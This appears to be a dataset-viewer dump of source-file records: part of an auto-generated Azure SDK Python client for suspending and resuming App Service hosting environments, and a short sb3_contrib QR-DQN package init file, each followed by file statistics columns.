exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def suspend_hosting_environment(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Suspends the hostingEnvironment.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`SiteCollection
<azure.mgmt.web.models.SiteCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SiteCollection', response)
if response.status_code == 202:
deserialized = self._deserialize('SiteCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def resume_hosting_environment(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""
Resumes the hostingEnvironment.
:param resource_group_name: Name of resource group
:type resource_group_name: str
:param name: Name of hostingEnvironment (App Service Environment)
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`SiteCollection
<azure.mgmt.web.models.SiteCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SiteCollection', response)
if response.status_code == 202:
deserialized = self._deserialize('SiteCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
| 46.469743
| 201
| 0.669689
| 13,183
| 122,866
| 6.035728
| 0.023667
| 0.03808
| 0.039525
| 0.03348
| 0.960864
| 0.957119
| 0.954052
| 0.951979
| 0.949968
| 0.947316
| 0
| 0.005786
| 0.234792
| 122,866
| 2,643
| 202
| 46.487325
| 0.840531
| 0.255856
| 0
| 0.885294
| 0
| 0.014706
| 0.189393
| 0.108515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041176
| false
| 0
| 0.003676
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d16fae30f964d6f9a7fe772cb208af2692ee18b
| 102
|
py
|
Python
|
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
sb3_contrib/qrdqn/__init__.py
|
satoshinakamotodotmyselfpointcom/stable-baselines3-contrib
|
81ef23d2702aeb73d36f000d882da313d21aadef
|
[
"MIT"
] | null | null | null |
from sb3_contrib.qrdqn.policies import CnnPolicy, MlpPolicy
from sb3_contrib.qrdqn.qrdqn import QRDQN
| 34
| 59
| 0.862745
| 15
| 102
| 5.733333
| 0.533333
| 0.162791
| 0.325581
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021505
| 0.088235
| 102
| 2
| 60
| 51
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.